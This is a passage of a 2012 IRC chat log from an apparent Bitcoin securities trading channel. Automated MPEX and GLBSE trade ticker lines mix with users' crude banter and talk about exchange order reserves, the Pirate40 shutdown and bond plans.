0.00038985 = 4.0092 BTC [+] Aug 17 20:32:38 [MPEX] [S.MPOE] 19041 @ 0.00038089 = 7.2525 BTC [-] Aug 17 20:32:39 [MPEX] [S.MPOE] 27935 @ 0.00037661 = 10.5206 BTC [-] Aug 17 20:32:43 [MPEX] [S.MPOE] 7916 @ 0.00038985 = 3.0861 BTC [+] Aug 17 20:32:44 [MPEX] [S.MPOE] 4200 @ 0.00039192 = 1.6461 BTC [+] Aug 17 20:32:45 [MPEX] [S.MPOE] 800 @ 0.0003928 = 0.3142 BTC [+] Aug 17 20:32:46 [MPEX] [S.MPOE] 10484 @ 0.0003965 = 4.1569 BTC [+] Aug 17 20:32:53 [MPEX] [S.MPOE] 11200 @ 0.00038516 = 4.3138 BTC [-] Aug 17 20:32:54 [MPEX] [S.MPOE] 23300 @ 0.0003965 = 9.2385 BTC [+] Aug 17 20:32:56 [MPEX] [S.MPOE] 27500 @ 0.0003965 = 10.9038 BTC [+] Aug 17 20:32:58 [MPEX] [S.MPOE] 5387 @ 0.00037661 = 2.0288 BTC [-] Aug 17 20:32:59 [GLBSE] [BITCOINMINV] 16 @ 0.115 = 1.84 BTC [-] Aug 17 20:33:00 [MPEX] [S.MPOE] 2143 @ 0.00037144 = 0.796 BTC [-] Aug 17 20:33:02 [MPEX] [S.MPOE] 5429 @ 0.00036815 = 1.9987 BTC [-] Aug 17 20:34:33 >_> Aug 17 20:34:35 ciuciu: Can I PM you? Aug 17 20:40:37 [MPEX] [O.BTCUSD.P140N] 3 @ 0.2574551 = 0.7724 BTC [-] Aug 17 20:43:12 Do any of you have a DMC's holdings report available with update prices and divs? Aug 17 20:44:19 [MPEX] [S.BVPS] 50 @ 0.003801 = 0.1901 BTC [+] Aug 17 20:51:06 [MPEX] [O.BTCUSD.P140N] 3 @ 0.2574551 = 0.7724 BTC [-] Aug 17 20:51:53 ahahahaaaaaa Aug 17 20:51:56 fuck you all bitches Aug 17 20:51:59 JAAAAAAAAAAAAAAAAAAAAAAA Aug 17 20:52:03 ?! Aug 17 20:52:07 sorry Aug 17 20:52:09 am happy Aug 17 20:52:13 !pl DMC 1@0.64 29-08-2012 Aug 17 20:52:13 Requesting data from GLBSE (might take a while). Aug 17 20:52:17 fucking FINALLY got something to work Aug 17 20:52:22 DMC [1@0.64BTC] (since: 29-08-2012) paid: 0 BTC. Last price: 0.045 BTC. Capital gain: -0.595 BTC. Total: -0.595 BTC. (-93%) Aug 17 20:52:24 that has been a right PIA Aug 17 20:52:24 getting married ? Aug 17 20:52:45 I've been married 10 years Aug 17 20:52:46 so Aug 17 20:52:47 no Aug 17 20:52:50 some code Aug 17 20:52:51 o. Aug 17 20:53:01 worked on test server didn't work on production Aug 17 20:53:02 why? Aug 17 20:53:07 I have no fucking cluw Aug 17 20:53:10 clue Aug 17 20:53:30 after painstaking re-implentation on production Aug 17 20:53:35 piece by peice Aug 17 20:53:41 from whatI I knew worked Aug 17 20:53:46 finally got it all working Aug 17 20:53:52 well done! Aug 17 20:54:09 will be rid of bitcoin reserves by Tuesday Aug 17 20:54:19 followed by a shitonne of improvements Aug 17 20:55:11 what's this mean, rid of reserves ? Aug 17 20:55:19 you'd think reserves are a good thing Aug 17 20:56:17 good to hear Aug 17 20:56:20 keep it up ^^ Aug 17 20:57:08 [MPEX] [S.MPOE] 12000 @ 0.00038174 = 4.5809 BTC [+] Aug 17 20:57:19 so glbse has godmode or something now? Aug 17 20:58:21 it will mean there will be no BTC reserve Aug 17 20:58:29 meaning many many buy orders Aug 17 20:58:33 oh yeah :) Aug 17 20:58:43 as long as they are less than the total value of the BTC available Aug 17 20:58:43 live now? Aug 17 20:58:47 not available yet no Aug 17 20:58:50 oh Aug 17 20:58:53 I'm thinking tuesday latest Aug 17 20:59:09 nice, i'm looking forward to it Aug 17 21:00:25 mircea_popescu: no reserves in this context means that you have 5 btc in the account. you can place as many 5 btc orders as you want. When one of them is taken, then the others are canceled Aug 17 21:00:30 [MPEX] [O.BTCUSD.P140N] 3 @ 0.2574551 = 0.7724 BTC [-] Aug 17 21:00:50 correct me if i'm wrong nefario :) Aug 17 21:01:06 correct Aug 17 21:01:19 it will massively improve liquidity Aug 17 21:01:30 it's whats been taking up my time as well Aug 17 21:01:34 or the semblance thereof. Aug 17 21:01:39 so I'll be able to add other things after Aug 17 21:02:24 semblance? Aug 17 21:02:45 well if someone can put in as many orders as they want based on 5 btc Aug 17 21:02:52 then the sum of orders isn't really the liquidity. Aug 17 21:02:58 the liquidity still is 5 btc. Aug 17 21:03:15 but it won't be restricted Aug 17 21:03:40 and the amount of trading that can be done with the same amount of BTC will increase Aug 17 21:03:40 yeah. sorta like how mtgox does it. Aug 17 21:03:44 [GLBSE] [FOO.PPPPT] 3 @ 1.011 = 3.033 BTC [+] Aug 17 21:03:46 [GLBSE] [FOO.PPPPT] 10 @ 1.01 = 10.1 BTC [-] Aug 17 21:03:47 [GLBSE] [FOO.PPPPT] 2 @ 1.0002 = 2.0004 BTC [-] Aug 17 21:03:49 [GLBSE] [FOO.PPPPT] 10 @ 1.0001 = 10.001 BTC [-] Aug 17 21:03:58 it means people can take advantage of more sell offers Aug 17 21:04:06 with such slow movement on some assets, it's an improvement Aug 17 21:04:34 maybe saying that it brings greater liquidity is not actually correct tho Aug 17 21:04:42 no not really Aug 17 21:04:49 actual amount of BTC stays the same Aug 17 21:04:54 it spreads the liquidity which is already there, around Aug 17 21:04:58 it has its advantages, as long as you can make sure that you're not hit with double spends Aug 17 21:05:02 [GLBSE] [YARR] 2 @ 1.3001 = 2.6002 BTC [-] Aug 17 21:05:02 hmmm can't really think of the correct term Aug 17 21:05:02 [GLBSE] [YARR] 10 @ 1.3 = 13 BTC [-] Aug 17 21:05:19 viscosity Aug 17 21:05:24 lol viscosity Aug 17 21:05:25 (sp?) Aug 17 21:05:26 [GLBSE] [YARR] 5 @ 1.25000001 = 6.25 BTC [-] Aug 17 21:05:27 [GLBSE] [YARR] 10 @ 1.25 = 12.5 BTC [-] Aug 17 21:05:55 [GLBSE] [YARR] 5 @ 1.20000001 = 6 BTC [-] Aug 17 21:05:56 [GLBSE] [YARR] 10 @ 1.2 = 12 BTC [-] Aug 17 21:06:10 that sounds so dirty Aug 17 21:06:14 like "moist" Aug 17 21:06:37 did you know that the hornier a girl is, the more viscuous her moisture ? Aug 17 21:06:42 myea, it's dirty alright. Aug 17 21:06:53 well, saying that it lowers the viscosity seems to describe it exactly Aug 17 21:07:07 [GLBSE] [YARR] 3 @ 1.15000001 = 3.45 BTC [-] Aug 17 21:07:07 lubes it up? Aug 17 21:07:08 [GLBSE] [MPOE.ETF] 7 @ 1.37719916 = 9.6404 BTC [-] Aug 17 21:07:09 [GLBSE] [MPOE.ETF] 1 @ 1.37719916 BTC [-] Aug 17 21:07:34 nefario : suppose i have 10 btc. i put in three orders, to buy A, B and C each for 10 btc. Aug 17 21:07:45 did i know, mp, lol, i once came across a girl who thought her stuff was my cum Aug 17 21:07:46 it just so happens that by accident at the EXACT SAME TIME two people sell, A and C Aug 17 21:07:48 what now ? Aug 17 21:07:53 [GLBSE] [TYGRR.BOND-P] 8 @ 0.975 = 7.8 BTC [-] Aug 17 21:08:03 [GLBSE] [YARR] 2 @ 1.15000001 = 2.3 BTC [-] Aug 17 21:08:05 [GLBSE] [YARR] 10 @ 1.15 = 11.5 BTC [-] Aug 17 21:08:06 [GLBSE] [YARR] 5 @ 1.10000011 = 5.5 BTC [-] Aug 17 21:08:07 [GLBSE] [YARR] 10 @ 1.1 = 11 BTC [-] Aug 17 21:08:08 [GLBSE] [BITCOINMINV] 2 @ 0.12295 = 0.2459 BTC [+] Aug 17 21:08:17 smickles i thought you were married too Aug 17 21:08:23 yea Aug 17 21:08:36 it's not like i was married since puberty tho Aug 17 21:08:45 hehehe. im just trying to stir trouble Aug 17 21:09:00 mircea_popescu: actual processing of trades has to happen in a queue Aug 17 21:09:11 as part of the processsing Aug 17 21:09:24 other orders then get cancelled Aug 17 21:09:27 [GLBSE] [TYGRR.BOND-P] 20 @ 0.975 = 19.5 BTC [-] Aug 17 21:09:40 http://suidobashijuko.jp/ Aug 17 21:09:41 doesn't this slow trade execution down ? Aug 17 21:09:42 this is Aug 17 21:09:43 ... Aug 17 21:09:47 very interesting Aug 17 21:10:19 mircea_popescu: not really, since there aren't trades 100% of the time Aug 17 21:10:20 [GLBSE] [TYGRR.BOND-P] 50 @ 0.975 = 48.75 BTC [-] Aug 17 21:10:25 all i see is a black screen Aug 17 21:10:38 I also like to have multiple orders out for same "money" available but this can cause huge swings in the orderbooks Aug 17 21:10:43 smickles its a robot maker i think ? Aug 17 21:11:05 [MPEX] [O.BTCUSD.P140T] 4 @ 0.10677196 = 0.4271 BTC [-] Aug 17 21:11:06 EskimoBob yea, that may be a problem. especially for daytraders. Aug 17 21:11:06 [MPEX] [O.BTCUSD.P140N] 3 @ 0.2574551 = 0.7724 BTC [-] Aug 17 21:11:08 "An organization which aims to spread human ride robots. " Aug 17 21:11:09 and Pirate shit it down - if you hadn't already seen Aug 17 21:11:14 heh Aug 17 21:11:15 shut Aug 17 21:11:20 [GLBSE] [PPT.A] 5 @ 1.1105 = 5.5525 BTC [-] Aug 17 21:11:22 [GLBSE] [PPT.A] 2 @ 1.1104 = 2.2208 BTC [-] Aug 17 21:11:33 huh ? Aug 17 21:11:36 what? Aug 17 21:11:45 [12:58] <@pirateat40> https://bitcointalk.org/index.php?topic=50822.msg605957#msg605957 Aug 17 21:12:12 lol nov 3 Aug 17 21:12:20 to today? Aug 17 21:12:27 aug 17? Aug 17 21:12:36 it shows the original post date Aug 17 21:12:49 he edited it today Aug 17 21:12:54 correct Aug 17 21:12:56 yeah it is happening Aug 17 21:12:59 prepare yourself Aug 17 21:13:17 [GLBSE] [BIF.BTCST.PPT] 1 @ 0.999 BTC [-] Aug 17 21:13:21 whoa it's closed. nanotube! Aug 17 21:13:30 yeah nano Aug 17 21:13:30 14 days to pay Aug 17 21:13:31 lets just hope that PPT guys do not fuck us all over Aug 17 21:13:41 if it's orderly pirate still wins bet? Aug 17 21:13:48 nope had to be till september. Aug 17 21:13:48 iirc Aug 17 21:14:01 wow Aug 17 21:14:07 hmm, now i dont recall the text. diodn't he have to survive till sept jcpham ? Aug 17 21:14:12 thought if he paid everyone back he still won Aug 17 21:14:13 this is going to hurt trade volume Aug 17 21:14:14 idk myself Aug 17 21:14:22 but i thought it was default Aug 17 21:14:25 failure to pay Aug 17 21:14:25 nefario: just a tad ;) Aug 17 21:14:29 "default" Aug 17 21:14:43 are you kidding ? volume is up like 100% Aug 17 21:14:46 [MPEX] [F.GIGA.ETF] 1500 @ 0.00095084 = 1.4263 BTC [+] Aug 17 21:14:47 [MPEX] [F.GIGA.ETF] 6188 @ 0.00095503 = 5.9097 BTC [+] Aug 17 21:14:51 no, if he closes down and returns money, this is NOT a default Aug 17 21:15:00 [GLBSE] [YARR] 1 @ 1.05 BTC [-] Aug 17 21:15:02 [GLBSE] [YARR] 5 @ 1.02000011 = 5.1 BTC [-] Aug 17 21:15:03 [GLBSE] [YARR] 30 @ 1.02000001 = 30.6 BTC [-] Aug 17 21:15:04 Someone should sell popcorn for BTC, they'd make a killing Aug 17 21:15:42 start pacing buy orders to PPT* :) Aug 17 21:15:48 [MPEX] [B.MPCD.A] 70000 @ 0.001 = 70 BTC Aug 17 21:16:22 [MPEX] [F.GIGA.ETF] 13400 @ 0.00093603 = 12.5428 BTC [-] Aug 17 21:16:24 [MPEX] [F.GIGA.ETF] 1100 @ 0.00092111 = 1.0132 BTC [-] Aug 17 21:16:29 [GLBSE] [BIF.BTCST.PPT] 3 @ 0.98 = 2.94 BTC [-] Aug 17 21:16:38 [MPEX] [B.MPCD.C] 64886 @ 0.001 = 64.886 BTC Aug 17 21:16:45 [GLBSE] [OBSI.HRPT] 20 @ 0.095 = 1.9 BTC [-] Aug 17 21:17:06 mircea_popescu: volume for options Aug 17 21:17:22 [MPEX] [B.MPCD.B] 119720 @ 0.001 = 119.72 BTC Aug 17 21:17:35 lmao i think that wiped the cdo ? Aug 17 21:17:43 [GLBSE] [NYAN.C] 2 @ 1.0500001 = 2.1 BTC [-] Aug 17 21:17:45 [GLBSE] [NYAN.C] 1 @ 1.0500001 BTC [-] Aug 17 21:17:46 [GLBSE] [NYAN.C] 28 @ 1.05 = 29.4 BTC [-] Aug 17 21:18:25 [GLBSE] [GIPPT] 1 @ 1.051 BTC [-] Aug 17 21:18:51 [MPEX] [B.MPCD.A] 3663 @ 0.001 = 3.663 BTC Aug 17 21:19:21 [GLBSE] [BIF.BTCST.PPT] 3 @ 0.978 = 2.934 BTC [-] Aug 17 21:19:48 [GLBSE] [PPT.DIV] 4 @ 0.4001 = 1.6004 BTC [-] Aug 17 21:20:03 [GLBSE] [TYGRR.BOND-P] 22 @ 0.975 = 21.45 BTC [-] Aug 17 21:20:13 [MPEX] [B.MPCD.B] 38943 @ 0.001 = 38.943 BTC Aug 17 21:20:22 [GLBSE] [BIF.BTCST.PPT] 4 @ 0.975 = 3.9 BTC [-] Aug 17 21:20:29 [MPEX] [O.BTCUSD.P140T] 4 @ 0.10677196 = 0.4271 BTC [-] Aug 17 21:20:34 [MPEX] [S.MPOE] 19041 @ 0.00038089 = 7.2525 BTC [-] Aug 17 21:20:36 [MPEX] [S.MPOE] 5387 @ 0.00037661 = 2.0288 BTC [-] Aug 17 21:20:37 [MPEX] [S.MPOE] 2143 @ 0.00037144 = 0.796 BTC [-] Aug 17 21:20:38 [MPEX] [S.MPOE] 26072 @ 0.00036815 = 9.5984 BTC [-] Aug 17 21:20:40 [MPEX] [S.MPOE] 5857 @ 0.00036707 = 2.1499 BTC [-] Aug 17 21:21:13 [GLBSE] [GIPPT] 4 @ 1.051 = 4.204 BTC [-] Aug 17 21:21:15 [GLBSE] [GIPPT] 1 @ 1.05 BTC [-] Aug 17 21:21:39 [GLBSE] [TYGRR.BOND-P] 10 @ 0.9741 = 9.741 BTC [-] Aug 17 21:21:41 [GLBSE] [TYGRR.BOND-P] 80 @ 0.974 = 77.92 BTC [-] Aug 17 21:21:42 [GLBSE] [TYGRR.BOND-P] 9 @ 0.973 = 8.757 BTC [-] Aug 17 21:21:44 [GLBSE] [TYGRR.BOND-P] 11 @ 0.971 = 10.681 BTC [-] Aug 17 21:21:44 [GLBSE] [TYGRR.BOND-PI] 2 @ 1.15 = 2.3 BTC [-] Aug 17 21:23:56 [GLBSE] [TYGRR.BOND-P] 39 @ 0.971 = 37.869 BTC [-] Aug 17 21:23:58 [GLBSE] [TYGRR.BOND-P] 61 @ 0.97 = 59.17 BTC [-] Aug 17 21:24:07 [GLBSE] [BDT] 3 @ 0.999 = 2.997 BTC [+] Aug 17 21:24:27 mircea_popescu: did it really now Aug 17 21:24:48 [GLBSE] [GIPPT] 3 @ 1.022 = 3.066 BTC [-] Aug 17 21:24:54 [GLBSE] [TYGRR.BOND-P] 39 @ 0.97 = 37.83 BTC [-] Aug 17 21:24:58 the parts of the cdo can't fulfill their obligations w/o pirate? Aug 17 21:24:59 smickles truth of the matter : not so many businesses in bitcoin land Aug 17 21:25:06 MAJOR PPT sell off lmfao Aug 17 21:25:08 no, i meant wiped as in, sold out. Aug 17 21:25:14 [GLBSE] [GIPPT] 2 @ 1.021 = 2.042 BTC [-] Aug 17 21:25:15 oh Aug 17 21:25:21 nobody in that cdo is pirate-facing. Aug 17 21:25:23 mircea_popescu: no, orderly shutdown with all funds returned, means no default, so pirate wins Aug 17 21:25:23 which is why. Aug 17 21:25:28 [GLBSE] [YABMC] 85 @ 0.1149 = 9.7665 BTC [+] Aug 17 21:25:30 [GLBSE] [PPT.DIV] 1 @ 0.4 BTC [-] Aug 17 21:25:34 nanotube he did it for the 5k! Aug 17 21:25:43 i'm sure he had other considerations :) Aug 17 21:25:45 lol that bet Aug 17 21:25:53 [GLBSE] [OBSI.HRPT] 1 @ 0.081 BTC [-] Aug 17 21:26:10 lol Aug 17 21:26:27 dude i tell you, if that guy ran a ponzi for ~1 year and manages to soft land it Aug 17 21:26:38 i'll have a whole lot of respect for him. its earned. Aug 17 21:26:44 Chaaang-Noi: are you around? Aug 17 21:26:48 so mircea_popescu, in this new world, what kind of coupon would be interesting for a Ss²cbond? Aug 17 21:26:56 er, s²cm Aug 17 21:27:04 1% Aug 17 21:27:07 smickles well, i was gonna say yest, are you tranching it ? Aug 17 21:27:08 =) Aug 17 21:27:16 or what else do you do ? Aug 17 21:27:40 i was hoping for a simple bond Aug 17 21:27:41 hi, give me a sec Aug 17 21:27:45 JWU42 : B.MPCD.A actually paus 2% and it's senior. Aug 17 21:27:51 [GLBSE] [TYGRR.BOND-PI] 90 @ 1.12000001 = 100.8 BTC [-] Aug 17 21:27:51 face value, small coupon, maturity Aug 17 21:27:55 smickles how do you convert your income to fixed return ? Aug 17 21:28:04 [GLBSE] [BIB.PIRATE] 1 @ 0.95 BTC [-] Aug 17 21:28:10 or just go for a normal honest to god bond like in sanityland ? Aug 17 21:28:21 [GLBSE] [OBSI.HRPT] 5 @ 0.08 = 0.4 BTC [-] Aug 17 21:28:30 [GLBSE] [BIB.PIRATE] 10 @ 0.95 = 9.5 BTC [-] Aug 17 21:28:41 [GLBSE] [TYGRR.BOND-P] 1 @ 0.96 BTC [-] Aug 17 21:28:44 we'd come up wiht amount that we know we could cover, even if most of our income falls thru Aug 17 21:28:51 aha Aug 17 21:29:04 well, mpbor was ~5% on the last month, so i'd guess something like that. Aug 17 21:29:07 [GLBSE] [TYGRR.BOND-P] 4 @ 0.94 = 3.76 BTC [-] Aug 17 21:29:15 or 1% ish a week if you do weeks. Aug 17 21:29:48 [GLBSE] [NYAN.C] 1 @ 1 BTC [-] Aug 17 21:30:02 so something about 52% yearly? Aug 17 21:30:15 [GLBSE] [YARR] 13 @ 1.15 = 14.95 BTC [+] Aug 17 21:30:57 [MPEX] [O.BTCUSD.P140N] 3 @ 0.2574551 = 0.7724 BTC [-] Aug 17 21:31:04 [GLBSE] [YABMC] 333 @ 0.115 = 38.295 BTC [+] Aug 17 21:31:06 5% per month is not 52% apr Aug 17 21:31:16 .py 1.05 ** 12 Aug 17 21:31:17 1.79585632602 Aug 17 21:31:18 massive fuck up Aug 17 21:31:29 EskimoBob hm ? Aug 17 21:32:35 [GLBSE] [BIB.PIRATE] 4 @ 0.95 = 3.8 BTC [-] Aug 17 21:32:36 [GLBSE] [BIB.PIRATE] 10 @ 0.902 = 9.02 BTC [-] Aug 17 21:32:37 [GLBSE] [BIB.PIRATE] 18 @ 0.901109 = 16.22 BTC [-] Aug 17 21:32:39 heh, mp, it's all about the sort of interest you're talking about Aug 17 21:33:12 [GLBSE] [OBSI.HRPT] 3 @ 0.08 = 0.24 BTC [-] Aug 17 21:33:19 we might be able to safely do 1% per week Aug 17 21:33:26 i'll need to crunch some numbers Aug 17 21:33:41 the whole pirate40 fuck up :) Aug 17 21:33:55 where's bitcoin kruger to explain that the btc economy needs negative interest bonds Aug 17 21:35:18 why isn't an apy of 100% appealing in bitcoin, everyone want more that 100% Aug 17 21:35:48 because pirate fucked things up Aug 17 21:36:07 now that he's out of the picture things might come back to some semblance of sanity. Aug 17 21:36:23 mircea_popescu: by definition, a ponzi cannot be softlanded. there cannot be enough money to pay all depositors. so if all funds are paid out, it was not a ponzi Aug 17 21:36:36 nanotube i know. Aug 17 21:36:42 that;s what i'm saying. Aug 17 21:36:49 hehe ok Aug 17 21:37:23 [GLBSE] [OBSI.HRPT] 2 @ 0.08 = 0.16 BTC [-] Aug 17 21:37:33 Interesting, what happens to zeros? Aug 17 21:38:04 [GLBSE] [BIF.1YR.LOAN] 1 @ 0.96153845 BTC [+] Aug 17 21:39:04 [MPEX] [B.MPCD.A] 1000 @ 1.003 = 1003 BTC [+] Aug 17 21:39:14 [GLBSE] [TYGRR.BOND-P] 10 @ 0.892 = 8.92 BTC [-] Aug 17 21:39:22 1003 btc Aug 17 21:39:25 bing Aug 17 21:39:52 lmao Aug 17 21:40:18 [GLBSE] [TYGRR.BOND-P] 3 @ 0.85 = 2.55 BTC [-] Aug 17 21:40:20 [GLBSE] [BITBOND] 3 @ 0.386 = 1.158 BTC [-] Aug 17 21:40:42 all these other things are taking a dive, mpcd gets a 1k buy Aug 17 21:40:43 I imagine things are going to be interesting over the next few days as people reinvest BS&T funds Aug 17 21:40:53 smickles i think that musta been a self trade. Aug 17 21:41:03 heh, it looks good tho Aug 17 21:41:07 usagi: what is your .C plan? Aug 17 21:41:10 if noone really looks at it Aug 17 21:41:23 [GLBSE] [BITBOND] 7 @ 0.3851 = 2.6957 BTC [-] Aug 17 21:41:39 smickles someone bought them out and i think is trying to get people to buy in quickly and not read the contract. Aug 17 21:41:45 Whut plan Aug 17 21:41:53 [GLBSE] [FOO.PPPPT] 30 @ 1 = 30 BTC [-] Aug 17 21:42:50 What do you mean what's my .C plan? Aug 17 21:43:00 nyan cat Aug 17 21:43:24 what happens to nyncat.c? Aug 17 21:44:22 [MPEX] [S.MPOE] 12800 @ 0.00038174 = 4.8863 BTC [+] Aug 17 21:44:27 Well Aug 17 21:44:34 It pays out about 8-9% a week Aug 17 21:44:43 that's the plan Aug 17 21:44:47 ... Aug 17 21:44:48 pirate shut down Aug 17 21:44:50 how ?! Aug 17 21:45:05 Obsi: hacked Aug 17 21:45:07 Shut down? Aug 17 21:45:09 all coins lost! Aug 17 21:45:12 Lol Aug 17 21:45:15 say wat Aug 17 21:45:18 I'll have to go read about it. Aug 17 21:45:19 lol Aug 17 21:45:23 nah, just kidding Aug 17 21:45:25 orderly shutdown next week Aug 17 21:45:30 Oh Aug 17 21:45:30 or so he claims Aug 17 21:45:33 So now what? Aug 17 21:45:33 I’ve spoken with my clients over the last week and come to an agreement that would allow me to close down my operation within a week. Currently my reserve (operating wallets) are drained from fulfilling the withdraw spree that happened after the rate drop announcement. All withdraws at this point will be delayed until Monday when the shutdown process begins.. Aug 17 21:45:36 copumpkin: excelent timing on that one :) Aug 17 21:45:38 this does not seem all that orderly. Aug 17 21:45:46 he will have to buy 100k btc on the open market ? Aug 17 21:45:49 prepare for $20 Aug 17 21:45:52 My advice Aug 17 21:45:55 is to sell YARR now,. Aug 17 21:45:58 mircea_popescu: he buys elsewhere too Aug 17 21:46:01 or so he claims :) Aug 17 21:46:03 "elsewhere". right. Aug 17 21:46:12 [GLBSE] [ZETA-MINING] 1 @ 0.141 BTC [-] Aug 17 21:46:26 this reminds me of the virgin kids in highschool. they had sex "elsewhere". Aug 17 21:46:34 as if at that age there's other places and other girls. Aug 17 21:46:37 so copumpkin, i imagine you're gonna exercise that cause in that contract, eh? Aug 17 21:47:12 lol Aug 17 21:48:08 Update Aug 17 21:48:08 Starting today, I've lifted the referral only requirement to open a Savings account. Aug 17 21:48:10 this on the 13th Aug 17 21:48:15 [GLBSE] [FOO.PPPPT] 1 @ 1 BTC [-] Aug 17 21:48:16 i think copumpkin had it : all coins lost. Aug 17 21:48:26 [MPEX] [S.MPOE] 18200 @ 0.00038174 = 6.9477 BTC [+] Aug 17 21:48:57 Ahh I see Aug 17 21:49:21 [GLBSE] [ZETA-MINING] 1 @ 0.14 BTC [-] Aug 17 21:49:34 YARR is about to go to 1. Cancel your bids :p Aug 17 21:49:52 Sell out while you still can Aug 17 21:50:05 [GLBSE] [TYGRR.BOND-P] 2 @ 0.8 = 1.6 BTC [-] Aug 17 21:50:55 [MPEX] [O.BTCUSD.P140T] 4 @ 0.10677196 = 0.4271 BTC [-] Aug 17 21:51:21 [GLBSE] [TYGRR.BOND-P] 5 @ 0.8 = 4 BTC [-] Aug 17 21:51:25 > mircea_popescu: as if at that age there's other places and other girls. Aug 17 21:51:27 hookers? Aug 17 21:51:49 I love me some hookers Aug 17 21:52:03 i want t make a 1000 btc bond which matures in 1 year and pays a monthly coupon of 15 btc, or something like that Aug 17 21:52:04 copumpkin Aug 17 21:52:11 you don't love hookers Aug 17 21:52:12 nefario Aug 17 21:52:14 you use them Aug 17 21:52:14 why not? Aug 17 21:52:15 oh Aug 17 21:52:17 well, I love them Aug 17 21:52:24 [GLBSE] [PPT.DIV] 1 @ 0.38 BTC [-] Aug 17 21:52:42 Well how this should play out is, NYAN.C and YARR should get 1 bitcoin back from our pirate investments Aug 17 21:52:49 er... intervals Aug 17 21:53:05 We will then operate a bidwall at 1. Aug 17 21:53:21 i love them too. nothing wrong with that. Aug 17 21:53:21 Do NOT sell NYAN or YARR for less than 1 bitcoin. Aug 17 21:53:29 [GLBSE] [PPT.DIV] 71 @ 0.3 = 21.3 BTC [-] Aug 17 21:53:46 usagi : there's the school of thought that nobody hears from pirate again. Aug 17 21:53:47 Both of them have nothing to do with pirate, YARR is insured even if we get 0 back Aug 17 21:54:06 NYAN.C is a derivative and if pirate goes to zero it is still worth 1 btc Aug 17 21:54:27 NYAN.C and YARR should get 1 bitcoin back from our pirate investments <> Both of them have nothing to do with pirate Aug 17 21:54:30 say wut ?! Aug 17 21:54:51 [GLBSE] [JAH] 1 @ 0.12 BTC [-] Aug 17 21:55:02 Because YARR is backed with over 2,000 in mining and other bonds Aug 17 21:55:12 if we get 0 back from pirate we begin liquidation and payout. Aug 17 21:55:30 weekly, i meant to say Aug 17 21:55:35 As it turns out, the market severely overvalued the premium on pirate insurance. Aug 17 21:55:41 If I were you.. I'd buy CPA shares now, :p Aug 17 21:56:01 As it turns out, the market severely overvalued the premium on pirate insurance. < ?! Aug 17 21:56:03 Well, actually, NYAN will be realizing that profit Aug 17 21:56:06 Holy crapola Aug 17 21:56:10 NYAN owns 50% of YARR Aug 17 21:56:17 After the payout there will be a huge dividend Aug 17 21:56:18 Ahahaha Aug 17 21:56:22 This is going to be funny Aug 17 21:56:26 [GLBSE] [PPT.DIV] 5 @ 0.3 = 1.5 BTC [-] Aug 17 21:56:32 And I've limited sales of NYAN.C to 3000 outstanding Aug 17 21:56:45 Here's your fair warning; If pirate returns all coins to investors Aug 17 21:56:50 smickles that might work. tho i'd make it 3 or 6 months. time compression online. Aug 17 21:56:57 NYAN will have a huge dividend.. hmm, more than 30% I think Aug 17 21:57:01 NYAN.C that is Aug 17 21:57:17 and if pirate returns nothing ? Aug 17 21:57:20 However there is a risk that pirate will return nothing and NYAN will pay zero for a couple of weeks Aug 17 21:57:25 NYAN.C I mean. Aug 17 21:57:35 NYAN will pay out because it passes thru from A and B as well Aug 17 21:57:56 If you believe pirate will shut down in an orderly fashion, NYAN.C is a good play. Aug 17 21:58:09 [GLBSE] [MPOE.ETF] 27 @ 1.37 = 36.99 BTC [-] Aug 17 21:58:19 really? Aug 17 21:58:33 NYAN.C owns 50% of YARR Aug 17 21:58:37 i.e. right to profit Aug 17 21:58:49 s.mpoe is on the rise, mpoe.etf is going down? Aug 17 21:58:53 odd huh ?! Aug 17 21:58:53 wtf market Aug 17 21:58:54 YARR's assets are something like 4700 coins with 2350 shares of pirate Aug 17 21:59:05 you'd expect people to divest pirate stuff move into nonpirate stuff Aug 17 21:59:24 So theoretically if we bid wall at 1 and shut down YARR we will be left with 2350 BTC of assets, which will go to NYAN.C. Aug 17 21:59:31 erm, half of it will go to C Aug 17 21:59:36 That's the plan Aug 17 21:59:49 hm pirate ending... i smell the short era of cdos Aug 17 22:00:21 In this case "high risk" will become things like timeshareafrica, DMC, and..... Mining Bonds? heh Aug 17 22:00:24 [MPEX] [O.BTCUSD.P140T] 4 @ 0.10677196 = 0.4271 BTC [-] Aug 17 22:00:25 [MPEX] [O.BTCUSD.P140N] 3 @ 0.2574551 = 0.7724 BTC [-] Aug 17 22:00:41 [MPEX] [S.MPOE] 19041 @ 0.00038089 = 7.2525 BTC [-] Aug 17 22:00:42 [MPEX] [S.MPOE] 5387 @ 0.00037661 = 2.0288 BTC [-] Aug 17 22:00:47 And JRO's new venture "ZapCoins" Aug 17 22:01:07 Hi, I'm Vince with ZapCoins. Your coins will be zapped away when you use ZapCoins. Aug 17 22:01:48 I'm actually kind of relieved. I had wanted to sell YARR and focus on writing a killer bitcoin app Aug 17 22:01:56 [GLBSE] [OBSI.1MHS] 10 @ 0.099 = 0.99 BTC [+] Aug 17 22:02:09 keeping up with daily payments is a huge drain Aug 17 22:02:51 back to 14.5 Aug 17 22:02:56 so it seems ALL gets sold off lol. Aug 17 22:04:12 [MPEX] [O.BTCUSD.P200T] 1000 @ 0.49516492 = 495.1649 BTC [-] Aug 17 22:04:22 [MPEX] [O.BTCUSD.P190T] 1000 @ 0.41792088 = 417.9209 BTC [-] Aug 17 22:04:32 [MPEX] [O.BTCUSD.P180T] 1000 @ 0.34364417 = 343.6442 BTC [-] Aug 17 22:04:38 o wow. Aug 17 22:04:48 puts unwinding. Aug 17 22:05:13 [GLBSE] [ASICMINER] 20 @ 0.1001 = 2.002 BTC [-] Aug 17 22:05:50 [GLBSE] [OBSI.1MHS] 21 @ 0.09989 = 2.0977 BTC [+] Aug 17 22:06:02 jees, ppl selling hard into the bot? Aug 17 22:06:19 wouldn't it be better to execute in that situation? Aug 17 22:06:28 these were short i think. Aug 17 22:08:30 [GLBSE] [BIB.PIRATE] 1 @ 0.9 BTC [-] Aug 17 22:09:23 ;;bc,24hprc Aug 17 22:09:24 14.44 Aug 17 22:09:29 woah Aug 17 22:09:33 i missed something Aug 17 22:09:40 what ? Aug 17 22:09:41 like a dollar Aug 17 22:10:01 last i knew, it was at 13.4ish Aug 17 22:10:23 hehe Aug 17 22:10:30 [MPEX] [F.GIGA.ETF] 5500 @ 0.00093777 = 5.1577 BTC [+] Aug 17 22:10:30 [MPEX] [F.GIGA.ETF] 3000 @ 0.00093603 = 2.8081 BTC [-] Aug 17 22:11:16 [GLBSE] [OBSI.HRPT] 4 @ 0.099 = 0.396 BTC [+] Aug 17 22:11:50 [GLBSE] [PPT.B] 5 @ 